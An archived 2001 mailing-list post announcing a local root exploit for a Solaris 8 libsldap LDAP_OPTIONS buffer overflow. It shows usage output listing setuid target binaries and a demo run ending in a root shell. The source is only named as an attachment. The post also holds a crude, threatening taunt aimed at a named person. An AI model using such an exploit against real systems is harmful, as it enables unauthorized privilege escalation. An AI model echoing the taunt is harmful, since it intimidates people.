From: Noir Desir (noir gsu.linux.org.tr)
Date: Thu Jul 05 2001 - 06:14:09 CDT
Hi,
I wish to free this one since it has been made public by some ppl.
libsldap hole has been known for long. As far as I know, sway hack.co.za
did actually find the hole several months ago and generously let me know
about it. All propz go to him. Thanks bro.
Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with
success.
I usually support the anti-sec movement but I got my reasons to publish
the exploit.
If you want to know why, please do mail me.
$ ./libsldap-exp
libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
Exploit code: noir gsu.linux.org.tr
Bug discovery: sway hack.co.za
Usage: ./libsldap-exp target#
target#: 0, /usr/bin/passwd Solaris8, Sparc64
target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
target#: 3, /usr/bin/chkey Solaris8, Sparc64
target#: 4, /usr/lib/sendmail Solaris8, Sparc64
$ ./libsldap-exp 0
# id
uid=0(root) gid=0(root)
#
PS: t(L)amer sahin, you are going to take such a kick in the ass that it will come out of your mouth.
I just wanted you to know : )
Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos
cheers,
noir
- TEXT/PLAIN attachment: libsldap-exp.c